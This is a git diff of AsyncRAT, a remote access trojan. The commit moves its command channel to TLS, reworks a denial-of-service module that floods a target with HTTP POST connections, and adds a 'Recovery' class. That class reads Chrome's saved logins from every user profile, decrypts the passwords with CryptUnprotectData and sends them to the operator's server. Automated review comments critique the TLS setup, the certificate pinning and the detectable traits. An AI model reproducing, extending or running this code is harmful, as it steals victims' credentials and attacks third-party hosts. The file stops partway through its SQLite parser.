@@ -187,7 +190,7 @@ ..\Resources\visit.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a - - ..\Resources\uac.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a + + ..\Resources\key.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a \ No newline at end of file diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Settings.Designer.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Settings.Designer.cs index 1f5fe2b..29a1fde 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Settings.Designer.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Settings.Designer.cs @@ -35,18 +35,6 @@ namespace AsyncRAT_Sharp.Properties { } } - [global::System.Configuration.UserScopedSettingAttribute()] - [global::System.Diagnostics.DebuggerNonUserCodeAttribute()] - [global::System.Configuration.DefaultSettingValueAttribute("")] - public string Password { - get { - return ((string)(this["Password"])); - } - set { - this["Password"] = value; - } - } - [global::System.Configuration.UserScopedSettingAttribute()] [global::System.Diagnostics.DebuggerNonUserCodeAttribute()] [global::System.Configuration.DefaultSettingValueAttribute("")] diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Settings.settings b/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Settings.settings index aad7ab9..b3dd690 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Settings.settings +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Settings.settings @@ -5,9 +5,6 @@ - - - diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Resources/AsyncRAT-Sharp.exe.config b/AsyncRAT-C#/AsyncRAT-Sharp/Resources/AsyncRAT-Sharp.exe.config index 61bc085..67f88a7 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Resources/AsyncRAT-Sharp.exe.config +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Resources/AsyncRAT-Sharp.exe.config @@ -11,22 +11,19 @@ - - - - + - + - + False - + 
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Resources/key.png b/AsyncRAT-C#/AsyncRAT-Sharp/Resources/key.png new file mode 100644 index 0000000000000000000000000000000000000000..da11779c0e8158049fe7461bcd483fcea68db406 GIT binary patch literal 828 zcmeAS@N?(olHy`uVBq!ia0vp^3LwnE0wix1Z>k4UEa{HEjtmSN`?>!lvVtU&J%W50 z7^>757#dm_7=8hT8eT9klo~KFyh>nTu$sZZAYL$MSD+10f+@+{-GzZ+Rj;xUkjGiz z5n0T@z;^_M8K-LVNdpDhOFVsD*&nlV3z^7#&Jm6VYU1*AaSZV|KKE*D#@Rxd;~%G6 zww-kjx;(*yQ!~#;bIIKbt!GZra+{`c3yJ5gS!0tTUgZ45>DCTqenpY2n2e0*xl51i zm}%ts%UhdiN-M?$<-+zC<@?ZU@t3JQ)e2$ynvVGlZLsk9B>rP6k zu-vz~^kkNL9p^ragc`*kGPzC9wf@ht^PIZl!NQk6KNQ_%yW&>TW#W+)K8sub+oc7k zdQ8%qW1l6if8eHfF!A8Oo;6pr9WSisN@tzD`Jw8*EOR~OTmhL)x1{g)gumKcVRkU= zU|--%-}wgx4>Dchp61G}Cv8v~Qsoph_o>w%fx}4$FJ>Gxo-6p$q|nh|h1%3FyM($$ z&V15T@?EjPb>{M2L7x4eG7e5SIq~O$Xvyh!<3%h#cJKTYzR}3`VpG^>-Ba2T`p-(Y zEa08}iE9;awZPSg7n9?(KR@v1-91Y-emcAU#dY`hXzba|P}B9h>F&*sXTzQz&_1Fn zd%Ewsl;?K!9V>2{J?%PjX6xlxPtL15KdQNE{@IogA;2Rk$igW;rI$6| zb7!_XqbIW5HNNU=aFdw-8%>%1g)W<|PKIncd;ZWzd+Q$)>b@U$EBc?msNCSN>V_jy z%fI&e9o=IEp-h{bqx(e z49%=ejjW6;v<-}`3=9J9aw?%{$jwj5OsmALL9t=uJfH?ikPX54X(i=}MX3zs<>h*r fdD+Fui3O>8`9 Online = new List(); public static List Blocked = new List(); public static string Port { get; set; } public static long Sent { get; set; } public static long Received { get; set; } - public static string Password { get; set; } - public static Aes256 AES{ get; set; } - public static readonly string Version = "AsyncRAT 0.4.7"; + public static string CertificatePath = Application.StartupPath + "\\ServerCertificate.p12"; + public static X509Certificate2 ServerCertificate; + public static readonly string Version = "AsyncRAT 0.4.8"; } } diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Socket/Clients.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Socket/Clients.cs index b2f63ca..b1ce66f 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Socket/Clients.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Socket/Clients.cs 
@@ -9,12 +9,15 @@ using System.Diagnostics; using System.Threading; using AsyncRAT_Sharp.MessagePack; using System.Text; +using System.Net.Security; +using System.Security.Authentication; namespace AsyncRAT_Sharp.Sockets { public class Clients { public Socket ClientSocket { get; set; } + public SslStream ClientSslStream { get; set; } public ListViewItem LV { get; set; } public ListViewItem LV2 { get; set; } public string ID { get; set; } @@ -23,15 +26,29 @@ namespace AsyncRAT_Sharp.Sockets private bool ClientBufferRecevied { get; set; } private MemoryStream ClientMS { get; set; } public object SendSync { get; } = new object(); - private object EndSendSync { get; } = new object(); public long BytesRecevied { get; set; } public Clients(Socket socket) { ClientSocket = socket; - ClientBuffer = new byte[4]; - ClientMS = new MemoryStream(); - ClientSocket.BeginReceive(ClientBuffer, 0, ClientBuffer.Length, SocketFlags.None, ReadClientData, null); + ClientSslStream = new SslStream(new NetworkStream(ClientSocket, true), false); + ClientSslStream.BeginAuthenticateAsServer(Settings.ServerCertificate, false, SslProtocols.Tls, false, EndAuthenticate, null); + } + + private void EndAuthenticate(IAsyncResult ar) + { + try + { + ClientSslStream.EndAuthenticateAsServer(ar); + ClientBuffer = new byte[4]; + ClientMS = new MemoryStream(); + ClientSslStream.BeginRead(ClientBuffer, 0, ClientBuffer.Length, ReadClientData, null); + } + catch + { + ClientSslStream?.Dispose(); + ClientSocket?.Dispose(); + } } public async void ReadClientData(IAsyncResult ar) 
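Review bot: `SslProtocols.Tls` in the `BeginAuthenticateAsServer` call restricts the handshake to TLS 1.0, a formally deprecated protocol version, and the same constant is used by the `AuthenticateAsClient` calls added in HandleFileManager.cs and HandleRemoteDesktop.cs. Because this commit also removes the application-layer AES wrapping, the confidentiality of every packet now rests on that one handshake, and with `clientCertificateRequired` set to `false` the server does not authenticate the connecting peer at the TLS layer. The bare `catch` in `EndAuthenticate` disposes the stream without recording why the handshake failed. A comment on the constructor would make the posture explicit: `// TLS 1.0 only, server-authenticated; no client certificate is requested`. A listener that negotiates only TLS 1.0 is also a distinctive trait in network telemetry.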
@@ -45,30 +62,32 @@ namespace AsyncRAT_Sharp.Sockets } else { - int Recevied = ClientSocket.EndReceive(ar); + int Recevied = ClientSslStream.EndRead(ar); if (Recevied > 0) { + await ClientMS.WriteAsync(ClientBuffer, 0, Recevied); if (!ClientBufferRecevied) { - await ClientMS.WriteAsync(ClientBuffer, 0, ClientBuffer.Length); - ClientBuffersize = BitConverter.ToInt32(ClientMS.ToArray(), 0); - ClientMS.Dispose(); - ClientMS = new MemoryStream(); - if (ClientBuffersize > 0) + if (ClientMS.Length == 4) { - ClientBuffer = new byte[ClientBuffersize]; - Debug.WriteLine("/// Server Buffersize " + ClientBuffersize.ToString() + " Bytes ///"); - ClientBufferRecevied = true; + ClientBuffersize = BitConverter.ToInt32(ClientMS.ToArray(), 0); + ClientMS.Dispose(); + ClientMS = new MemoryStream(); + if (ClientBuffersize > 0) + { + ClientBuffer = new byte[ClientBuffersize]; + Debug.WriteLine("/// Server Buffersize " + ClientBuffersize.ToString() + " Bytes ///"); + ClientBufferRecevied = true; + } } } else { - await ClientMS.WriteAsync(ClientBuffer, 0, Recevied); Settings.Received += Recevied; BytesRecevied += Recevied; if (ClientMS.Length == ClientBuffersize) { - ThreadPool.QueueUserWorkItem(Packet.Read, new object[] {ClientMS.ToArray(), this }); + ThreadPool.QueueUserWorkItem(Packet.Read, new object[] { ClientMS.ToArray(), this }); ClientBuffer = new byte[4]; ClientMS.Dispose(); ClientMS = new MemoryStream(); @@ -77,7 +96,7 @@ namespace AsyncRAT_Sharp.Sockets else ClientBuffer = new byte[ClientBuffersize - ClientMS.Length]; } - ClientSocket.BeginReceive(ClientBuffer, 0, ClientBuffer.Length, SocketFlags.None, ReadClientData, null); + ClientSslStream.BeginRead(ClientBuffer, 0, ClientBuffer.Length, ReadClientData, null); } else { @@ -121,6 +140,7 @@ namespace AsyncRAT_Sharp.Sockets try { + ClientSslStream?.Dispose(); ClientSocket?.Dispose(); ClientMS?.Dispose(); } 
@@ -141,12 +161,15 @@ namespace AsyncRAT_Sharp.Sockets if ((byte[])msg == null) return; - byte[] buffer = Settings.AES.Encrypt((byte[])msg); + byte[] buffer = (byte[])msg; byte[] buffersize = BitConverter.GetBytes(buffer.Length); ClientSocket.Poll(-1, SelectMode.SelectWrite); - ClientSocket.BeginSend(buffersize, 0, buffersize.Length, SocketFlags.None, EndSend, null); - ClientSocket.BeginSend(buffer, 0, buffer.Length, SocketFlags.None, EndSend, null); + ClientSslStream.Write(buffersize, 0, buffersize.Length); + ClientSslStream.Write(buffer, 0, buffer.Length); + ClientSslStream.Flush(); + Debug.WriteLine("/// Server Sent " + buffer.Length.ToString() + " Bytes ///"); + Settings.Sent += buffer.Length; } catch { 
@@ -157,53 +180,27 @@ namespace AsyncRAT_Sharp.Sockets } } - private void EndSend(IAsyncResult ar) - { - lock (EndSendSync) - { - try - { - if (!ClientSocket.Connected) - { - Disconnected(); - return; - } - - int sent = 0; - sent = ClientSocket.EndSend(ar); - Debug.WriteLine("/// Server Sent " + sent.ToString() + " Bytes ///"); - Settings.Sent += sent; - } - catch - { - Disconnected(); - return; - } - } - } - public void Ping(object obj) { lock (SendSync) { - lock (EndSendSync) + + try { - try - { - MsgPack msgpack = new MsgPack(); - msgpack.ForcePathObject("Packet").AsString = "Ping"; - msgpack.ForcePathObject("Message").AsString = "This is a ping!"; - byte[] buffer = Settings.AES.Encrypt(msgpack.Encode2Bytes()); - byte[] buffersize = BitConverter.GetBytes(buffer.Length); - ClientSocket.Poll(-1, SelectMode.SelectWrite); - ClientSocket.Send(buffersize, 0, buffersize.Length, SocketFlags.None); - ClientSocket.Send(buffer, 0, buffer.Length, SocketFlags.None); - } - catch - { - Disconnected(); - return; - } + MsgPack msgpack = new MsgPack(); + msgpack.ForcePathObject("Packet").AsString = "Ping"; + msgpack.ForcePathObject("Message").AsString = "This is a ping!"; + byte[] buffer = msgpack.Encode2Bytes(); + byte[] buffersize = BitConverter.GetBytes(buffer.Length); + ClientSocket.Poll(-1, SelectMode.SelectWrite); + ClientSslStream.Write(buffersize, 0, buffersize.Length); + ClientSslStream.Write(buffer, 0, buffer.Length); + ClientSslStream.Flush(); + } + catch + { + Disconnected(); + return; } } } diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/packages.config b/AsyncRAT-C#/AsyncRAT-Sharp/packages.config index d976469..f0824a4 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/packages.config +++ b/AsyncRAT-C#/AsyncRAT-Sharp/packages.config @@ -1,4 +1,5 @@  + \ No newline at end of file diff --git a/AsyncRAT-C#/Client/Client.csproj b/AsyncRAT-C#/Client/Client.csproj index 4fc68ff..356dc45 100644 --- a/AsyncRAT-C#/Client/Client.csproj +++ b/AsyncRAT-C#/Client/Client.csproj 
@@ -72,10 +72,13 @@ + + + @@ -99,6 +102,8 @@ + + diff --git a/AsyncRAT-C#/Client/Cryptography/Sha256.cs b/AsyncRAT-C#/Client/Cryptography/Sha256.cs new file mode 100644 index 0000000..c8a2453 --- /dev/null +++ b/AsyncRAT-C#/Client/Cryptography/Sha256.cs @@ -0,0 +1,33 @@ +using System.Security.Cryptography; +using System.Text; + +namespace Client.Cryptography +{ + public static class Sha256 + { + public static string ComputeHash(string input) + { + byte[] data = Encoding.UTF8.GetBytes(input); + + using (SHA256Managed sha = new SHA256Managed()) + { + data = sha.ComputeHash(data); + } + + StringBuilder hash = new StringBuilder(); + + foreach (byte _byte in data) + hash.Append(_byte.ToString("X2")); + + return hash.ToString().ToUpper(); + } + + public static byte[] ComputeHash(byte[] input) + { + using (SHA256Managed sha = new SHA256Managed()) + { + return sha.ComputeHash(input); + } + } + } +} diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleDos.cs b/AsyncRAT-C#/Client/Handle Packet/HandleDos.cs index 58a8ebf..cdfa010 100644 --- a/AsyncRAT-C#/Client/Handle Packet/HandleDos.cs +++ b/AsyncRAT-C#/Client/Handle Packet/HandleDos.cs @@ -30,7 +30,7 @@ namespace Client.Handle_Packet host = new Uri(unpack_msgpack.ForcePathObject("Host").AsString).DnsSafeHost; port = Convert.ToInt32(unpack_msgpack.ForcePathObject("port").AsString); timeout = Convert.ToInt32(unpack_msgpack.ForcePathObject("timeout").AsString) * 60; - List listOfClients = new List(); + List SocketList = new List(); TimeSpan timespan = TimeSpan.FromSeconds(timeout); Stopwatch stopwatch = new Stopwatch(); stopwatch.Start(); 
@@ -42,11 +42,12 @@ namespace Client.Handle_Packet { try { - TcpClient tcp = new TcpClient(host.ToString(), port); - listOfClients.Add(tcp); + Socket tcp = new Socket(AddressFamily.InterNetwork,SocketType.Stream,ProtocolType.Tcp); + tcp.Connect(host.ToString(), port); + SocketList.Add(tcp); string post = $"POST / HTTP/1.1\r\nHost: {host} \r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: {userAgents[new Random().Next(userAgents.Length)]}\r\nContent-length: 5235\r\n\r\n"; byte[] buffer = Encoding.UTF8.GetBytes(post); - tcp.Client.Send(buffer, 0, buffer.Length, SocketFlags.None); + tcp.Send(buffer, 0, buffer.Length, SocketFlags.None); } catch { @@ -57,9 +58,9 @@ namespace Client.Handle_Packet } Thread.Sleep(1000); - foreach (TcpClient tcp in listOfClients.ToList()) + foreach (Socket tcp in SocketList.ToList()) { - tcp?.Client.Dispose(); + tcp?.Dispose(); } } diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleFileManager.cs b/AsyncRAT-C#/Client/Handle Packet/HandleFileManager.cs index 471190a..a34ea55 100644 --- a/AsyncRAT-C#/Client/Handle Packet/HandleFileManager.cs +++ b/AsyncRAT-C#/Client/Handle Packet/HandleFileManager.cs @@ -9,6 +9,10 @@ using System.Linq; using System.Text; using System.Diagnostics; using System.Net.Sockets; +using System.Security.Authentication; +using System.Net.Security; +using System.Security.Cryptography.X509Certificates; + namespace Client.Handle_Packet { public class FileManager 
@@ -97,6 +101,8 @@ namespace Client.Handle_Packet SendBufferSize = 50 * 1024, }; Client.Connect(ClientSocket.Client.RemoteEndPoint.ToString().Split(':')[0], Convert.ToInt32(ClientSocket.Client.RemoteEndPoint.ToString().Split(':')[1])); + SslStream SslClient = new SslStream(new NetworkStream(Client, true), false, ValidateServerCertificate); + SslClient.AuthenticateAsClient(Client.RemoteEndPoint.ToString().Split(':')[0], null, SslProtocols.Tls, false); MsgPack msgpack = new MsgPack(); msgpack.ForcePathObject("Packet").AsString = "socketDownload"; @@ -104,7 +110,7 @@ namespace Client.Handle_Packet msgpack.ForcePathObject("DWID").AsString = dwid; msgpack.ForcePathObject("File").AsString = file; msgpack.ForcePathObject("Size").AsString = new FileInfo(file).Length.ToString(); - ChunkSend(Settings.aes256.Encrypt(msgpack.Encode2Bytes()), Client); + ChunkSend(msgpack.Encode2Bytes(), Client, SslClient); MsgPack msgpack2 = new MsgPack(); @@ -113,7 +119,7 @@ namespace Client.Handle_Packet msgpack2.ForcePathObject("DWID").AsString = dwid; msgpack2.ForcePathObject("Name").AsString = Path.GetFileName(file); msgpack2.ForcePathObject("File").SetAsBytes(File.ReadAllBytes(file)); - ChunkSend(Settings.aes256.Encrypt(msgpack2.Encode2Bytes()), Client); + ChunkSend(msgpack2.Encode2Bytes(), Client, SslClient); Client.Shutdown(SocketShutdown.Both); Client.Dispose(); @@ -124,17 +130,17 @@ namespace Client.Handle_Packet } } - private void ChunkSend(byte[] msg, Socket client) + private void ChunkSend(byte[] msg, Socket client, SslStream ssl) { try { byte[] buffersize = BitConverter.GetBytes(msg.Length); client.Poll(-1, SelectMode.SelectWrite); - client.Send(buffersize); + ssl.Write(buffersize); + ssl.Flush(); int chunkSize = 50 * 1024; byte[] chunk = new byte[chunkSize]; - int SendPackage; using (MemoryStream buffereReader = new MemoryStream(msg)) { BinaryReader binaryReader = new BinaryReader(buffereReader); 
@@ -143,7 +149,8 @@ namespace Client.Handle_Packet { chunk = binaryReader.ReadBytes(chunkSize); bytesToRead -= chunkSize; - SendPackage = client.Send(chunk); + ssl.Write(chunk); + ssl.Flush(); } while (bytesToRead > 0); binaryReader.Dispose(); @@ -154,5 +161,14 @@ namespace Client.Handle_Packet return; } } + + private bool ValidateServerCertificate(object sender, X509Certificate certificate, X509Chain chain, SslPolicyErrors sslPolicyErrors) + { +#if DEBUG + return true; +#endif + return Settings.ServerCertificate.Equals(certificate); + } + } } diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleRemoteDesktop.cs b/AsyncRAT-C#/Client/Handle Packet/HandleRemoteDesktop.cs index 08bc3cb..2d3bca1 100644 --- a/AsyncRAT-C#/Client/Handle Packet/HandleRemoteDesktop.cs +++ b/AsyncRAT-C#/Client/Handle Packet/HandleRemoteDesktop.cs @@ -10,6 +10,9 @@ using Client.Helper; using System; using Client.StreamLibrary.UnsafeCodecs; using Client.StreamLibrary; +using System.Net.Security; +using System.Security.Cryptography.X509Certificates; +using System.Security.Authentication; namespace Client.Handle_Packet { @@ -22,6 +25,9 @@ namespace Client.Handle_Packet Socket Client = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp); Client.Connect(ClientSocket.Client.RemoteEndPoint.ToString().Split(':')[0], Convert.ToInt32(ClientSocket.Client.RemoteEndPoint.ToString().Split(':')[1])); + SslStream SslClient = new SslStream(new NetworkStream(Client, true), false, ValidateServerCertificate); + SslClient.AuthenticateAsClient(Client.RemoteEndPoint.ToString().Split(':')[0], null, SslProtocols.Tls, false); + string hwid = Methods.HWID(); IUnsafeCodec unsafeCodec = new UnsafeStreamCodec(quality); while (Client.Connected) 
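Review bot: `ValidateServerCertificate` never looks at `chain` or `sslPolicyErrors`: under `#if DEBUG` it returns `true` for any certificate (leaving the following `return` unreachable in that configuration), and otherwise it relies solely on `Settings.ServerCertificate.Equals(certificate)`. On .NET Framework, `X509Certificate.Equals` is documented as comparing issuer and serial number rather than the full certificate, so the pin is looser than it reads. The identical callback is added again in HandleRemoteDesktop.cs; a single shared helper would keep the two copies from drifting apart. At minimum the behaviour should be stated on the method: `// DEBUG: accepts any certificate. Release: Equals() against Settings.ServerCertificate only; chain and policy errors are ignored`.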
@@ -42,8 +48,10 @@ namespace Client.Handle_Packet msgpack.ForcePathObject("ID").AsString = hwid; msgpack.ForcePathObject("Stream").SetAsBytes(stream.ToArray()); - Client.Send(BitConverter.GetBytes(Settings.aes256.Encrypt(msgpack.Encode2Bytes()).Length)); - Client.Send(Settings.aes256.Encrypt(msgpack.Encode2Bytes())); + SslClient.Write(BitConverter.GetBytes(msgpack.Encode2Bytes().Length)); + SslClient.Write(msgpack.Encode2Bytes()); + SslClient.Flush(); + Thread.Sleep(100); } } bmp.UnlockBits(bmpData); @@ -66,5 +74,14 @@ namespace Client.Handle_Packet } catch { return new Bitmap(rect.Width, rect.Height); } } + + private bool ValidateServerCertificate(object sender, X509Certificate certificate, X509Chain chain, SslPolicyErrors sslPolicyErrors) + { +#if DEBUG + return true; +#endif + return Settings.ServerCertificate.Equals(certificate); + } + } } diff --git a/AsyncRAT-C#/Client/Handle Packet/Packet.cs b/AsyncRAT-C#/Client/Handle Packet/Packet.cs index eac8782..57f03ba 100644 --- a/AsyncRAT-C#/Client/Handle Packet/Packet.cs +++ b/AsyncRAT-C#/Client/Handle Packet/Packet.cs @@ -7,6 +7,7 @@ using System.Net.Sockets; using System.Text; using System.Threading; using System.Windows.Forms; +using Client.Recovery; namespace Client.Handle_Packet { @@ -19,7 +20,7 @@ namespace Client.Handle_Packet try { MsgPack unpack_msgpack = new MsgPack(); - unpack_msgpack.DecodeFromBytes(Settings.aes256.Decrypt((byte[])data)); + unpack_msgpack.DecodeFromBytes((byte[])data); switch (unpack_msgpack.ForcePathObject("Packet").AsString) { case "sendMessage": @@ -55,6 +56,12 @@ namespace Client.Handle_Packet break; } + case "recoveryPassword": + { + new Recovery.Recovery(); + break; + } + case "defender": { new HandleWindowsDefender(); diff --git a/AsyncRAT-C#/Client/Program.cs b/AsyncRAT-C#/Client/Program.cs index 6bd0f4f..6c353ca 100644 --- a/AsyncRAT-C#/Client/Program.cs +++ b/AsyncRAT-C#/Client/Program.cs 
@@ -11,6 +11,10 @@ using Client.Helper; // This program Is distributed for educational purposes only. +// Credits; +// Serialization @ymofen +// StreamLibrary @Dergan +// Special Thanks MaxXor@hf gigajew@hf namespace Client { diff --git a/AsyncRAT-C#/Client/Recovery/Recovery.cs b/AsyncRAT-C#/Client/Recovery/Recovery.cs new file mode 100644 index 0000000..66f2344 --- /dev/null +++ b/AsyncRAT-C#/Client/Recovery/Recovery.cs 
@@ -0,0 +1,219 @@ +using System; +using System.Collections.Generic; +using System.IO; +using System.Runtime.InteropServices; +using System.Text; +using Client.MessagePack; +using Client.Sockets; + +namespace Client.Recovery +{ + internal class Recovery + { + public string Pass; + + public void recoverAll() + { + recoverChrome(); + } + + public Recovery() + { + this.Drive = Drive = new DriveInfo(Path.GetPathRoot(Environment.SystemDirectory)); + recoverAll(); + if (Pass.Length > 1) + { + MsgPack msgpack = new MsgPack(); + msgpack.ForcePathObject("Packet").AsString = "recoveryPassword"; + msgpack.ForcePathObject("Password").AsString = Pass; + ClientSocket.Send(msgpack.Encode2Bytes()); + } + } + + public DriveInfo Drive; + + private bool isWindowsXP() + { + return (Environment.OSVersion.Version.Major == 5); + } + + private string[] GetAppDataFolders() + { + List iList = new List(); + if (isWindowsXP()) + { + foreach (string Dir in Directory.GetDirectories(Drive.RootDirectory.FullName + @"Documents and Settings\", "*", SearchOption.TopDirectoryOnly)) + iList.Add(Dir + "Application Data"); + } + else + foreach (string Dir in Directory.GetDirectories(Drive.RootDirectory.FullName + @"Users\", "*", SearchOption.TopDirectoryOnly)) + { + DirectoryInfo dirInfo = new DirectoryInfo(Dir); + iList.Add(Drive.RootDirectory.FullName + @"Users\" + dirInfo.Name + @"\AppData"); + } + return iList.ToArray(); + } + + + [DllImport("Crypt32.dll", SetLastError = true, CharSet = System.Runtime.InteropServices.CharSet.Auto)] + [return: MarshalAs(UnmanagedType.Bool)] + private static extern bool CryptProtectData( + ref DATA_BLOB pDataIn, + String szDataDescr, + ref DATA_BLOB pOptionalEntropy, + IntPtr pvReserved, + ref CRYPTPROTECT_PROMPTSTRUCT pPromptStruct, + CryptProtectFlags dwFlags, + ref DATA_BLOB pDataOut +); + + [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] + private struct DATA_BLOB + { + public int cbData; + public IntPtr pbData; + } + + 
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] + private struct CRYPTPROTECT_PROMPTSTRUCT + { + public int cbSize; + public CryptProtectPromptFlags dwPromptFlags; + public IntPtr hwndApp; + public String szPrompt; + } + + [Flags] + private enum CryptProtectPromptFlags + { + // prompt on unprotect + CRYPTPROTECT_PROMPT_ON_UNPROTECT = 0x1, + + // prompt on protect + CRYPTPROTECT_PROMPT_ON_PROTECT = 0x2 + } + + [Flags] + private enum CryptProtectFlags + { + // for remote-access situations where ui is not an option + // if UI was specified on protect or unprotect operation, the call + // will fail and GetLastError() will indicate ERROR_PASSWORD_RESTRICTION + CRYPTPROTECT_UI_FORBIDDEN = 0x1, + + // per machine protected data -- any user on machine where CryptProtectData + // took place may CryptUnprotectData + CRYPTPROTECT_LOCAL_MACHINE = 0x4, + + // force credential synchronize during CryptProtectData() + // Synchronize is only operation that occurs during this operation + CRYPTPROTECT_CRED_SYNC = 0x8, + + // Generate an Audit on protect and unprotect operations + CRYPTPROTECT_AUDIT = 0x10, + + // Protect data with a non-recoverable key + CRYPTPROTECT_NO_RECOVERY = 0x20, + + // Verify the protection of a protected blob + CRYPTPROTECT_VERIFY_PROTECTION = 0x40 + } + + [ +DllImport("Crypt32.dll", +SetLastError = true, +CharSet = System.Runtime.InteropServices.CharSet.Auto) +] + [return: MarshalAs(UnmanagedType.Bool)] + private static extern bool CryptUnprotectData( + ref DATA_BLOB pDataIn, + StringBuilder szDataDescr, + ref DATA_BLOB pOptionalEntropy, + IntPtr pvReserved, + ref CRYPTPROTECT_PROMPTSTRUCT pPromptStruct, + CryptProtectFlags dwFlags, + ref DATA_BLOB pDataOut +); + + + private string Decrypt(byte[] Datas) + { + try + { + DATA_BLOB inj, Ors = new DATA_BLOB(); + DATA_BLOB asd = new DATA_BLOB(); + GCHandle Ghandle = GCHandle.Alloc(Datas, GCHandleType.Pinned); + inj.pbData = Ghandle.AddrOfPinnedObject(); + inj.cbData = Datas.Length; + 
Ghandle.Free(); + CRYPTPROTECT_PROMPTSTRUCT asdf = new CRYPTPROTECT_PROMPTSTRUCT(); + string aha = string.Empty; + CryptUnprotectData(ref inj, null, ref asd, default(IntPtr), ref asdf, 0, ref Ors); + + // ref DATA_BLOB pDataIn, + //StringBuilder szDataDescr, + // ref DATA_BLOB pOptionalEntropy, + // IntPtr pvReserved, + // ref CRYPTPROTECT_PROMPTSTRUCT pPromptStruct, + // CryptProtectFlags dwFlags, + // ref DATA_BLOB pDataOut + + byte[] Returned = new byte[Ors.cbData + 1]; + Marshal.Copy(Ors.pbData, Returned, 0, Ors.cbData); + string TheString = Encoding.UTF8.GetString(Returned); + return TheString.Substring(0, TheString.Length - 1); + } + catch + { + return ""; + } + } + + public void recoverChrome() + { + try + { + foreach (string AppData in GetAppDataFolders()) + { + try + { + if (!File.Exists(AppData + @"\Local\Google\Chrome\User Data\Default\Login Data")) + continue; + SQLiteHandler sql = new SQLiteHandler(AppData + @"\Local\Google\Chrome\User Data\Default\Login Data"); + + try + { + sql.ReadTable("logins"); + } + catch { } + + for (int i = 0; i <= sql.GetRowCount() - 1; i++) + { + string url = sql.GetValue(i, "origin_url"); + string username = sql.GetValue(i, "username_value"); + string password_crypted = sql.GetValue(i, "password_value"); + string password = string.Empty; + if (!string.IsNullOrEmpty(password_crypted)) + { + password = Decrypt(Encoding.Default.GetBytes(password_crypted)); + } + else + { + password = ""; + } + + // Format like this: + // Type \n URL \n User \n Pass \n\n + Pass += "Chrome\n" + url + "\n" + username + "\n" + password + "\n\n"; + } + } + catch (Exception eax) + { + Console.WriteLine(eax.ToString()); + } + } + } + catch { } + } + } +} \ No newline at end of file diff --git a/AsyncRAT-C#/Client/Recovery/SQLiteHandler.cs b/AsyncRAT-C#/Client/Recovery/SQLiteHandler.cs new file mode 100644 index 0000000..1f794e0 --- /dev/null +++ b/AsyncRAT-C#/Client/Recovery/SQLiteHandler.cs 
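Review bot: The new `Recovery` class has no comment stating what it reads or where the result goes, and the name understates it. As written, `GetAppDataFolders` lists every profile directory under `Users\` (or `Documents and Settings\` when the OS major version is 5), and `recoverChrome` opens each profile's `\Local\Google\Chrome\User Data\Default\Login Data` and reads `origin_url`, `username_value` and `password_value` from the `logins` table. It passes the last value to `CryptUnprotectData`, and the constructor sends the concatenated text to the server in a `recoveryPassword` packet. A class-level summary saying exactly that should be added. The same two operations, a non-browser process opening `Login Data` and then calling `CryptUnprotectData` from Crypt32.dll, are what endpoint monitoring would key on.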
@@ -0,0 +1,473 @@ +using Microsoft.VisualBasic; +using Microsoft.VisualBasic.CompilerServices; +using System; +using System.IO; +using System.Runtime.InteropServices; +using System.Text; + +namespace Client.Recovery +{ + public class SQLiteHandler + { + private byte[] db_bytes; + private ulong encoding; + private string[] field_names; + private sqlite_master_entry[] master_table_entries; + private ushort page_size; + private byte[] SQLDataTypeSize = new byte[] { 0, 1, 2, 3, 4, 6, 8, 8, 0, 0 }; + private table_entry[] table_entries; + + public SQLiteHandler(string baseName) + { + if (File.Exists(baseName)) + { + FileSystem.FileOpen(1, baseName, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared, -1); + string str = Strings.Space((int)FileSystem.LOF(1)); + FileSystem.FileGet(1, ref str, -1L, false); + FileSystem.FileClose(new int[] { 1 }); + this.db_bytes = Encoding.Default.GetBytes(str); + if (Encoding.Default.GetString(this.db_bytes, 0, 15).CompareTo("SQLite format 3") != 0) + { + throw new Exception("Not a valid SQLite 3 Database File"); + } + if (this.db_bytes[0x34] != 0) + { + throw new Exception("Auto-vacuum capable database is not supported"); + } + //if (decimal.Compare(new decimal(this.ConvertToInteger(0x2c, 4)), 4M) >= 0) + //{ + // throw new Exception("No supported Schema layer file-format"); + //} + this.page_size = (ushort)this.ConvertToInteger(0x10, 2); + this.encoding = this.ConvertToInteger(0x38, 4); + if (decimal.Compare(new decimal(this.encoding), decimal.Zero) == 0) + { + this.encoding = 1L; + } + this.ReadMasterTable(100L); + } + } + + private ulong ConvertToInteger(int startIndex, int Size) + { + if ((Size > 8) | (Size == 0)) + { + return 0L; + } + ulong num2 = 0L; + int num4 = Size - 1; + for (int i = 0; i <= num4; i++) + { + num2 = (num2 << 8) | this.db_bytes[startIndex + i]; + } + return num2; + } + + private long CVL(int startIndex, int endIndex) + { + endIndex++; + byte[] buffer = new byte[8]; + int num4 = endIndex - startIndex; + bool flag 
